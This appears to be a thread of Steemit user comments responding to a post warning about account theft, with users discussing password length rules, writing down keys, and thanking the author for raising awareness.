Unfortunately, I ran into a few people that feel the same way except they are pointing to that being their reason to not join us. They just don't get the fact that we are dealing with real money here, money that can be stolen and never returned.
Exactly, I think they should protect their money for sure. My comment got all messed up somehow and I had to edit it again, I guess you cannot say anything about yo + ur Pa = +as word lol. I had to type it out weird to get around a filter I guess? hmm.
Anyways, If they just made you pick a password with at least 20 characters, 1 capital, 1 lowercase, 1 special symbol, 1 number, and no more than 3 repeating nums/chars/symbols, i think that would be fine. I feel like someone is more likely to hack my computer and steal my password for steem than they are to guess my password. not to mention I have to write it down and also have multiple copies somewhere.
I completely agree. I have to haven't written down , a photo printed out too so I don't mess up when writing it down and other archaic methods of 'securing' my Steemit account.
Thanks for the warning.. following you!
I hope all is well with @virtualgrowth. I like that guy! A sobering read I have to say!
I can't help but wonder of those who did it looked at that memo and though "Oh crap. I hope no one ever sees that."Wow! Nice job, @noisy! I would never have thought of that.
Great, you remind me to be more careful. Thank you! :)
Nice work! I resteemed this post so as to raise the awareness of this issue!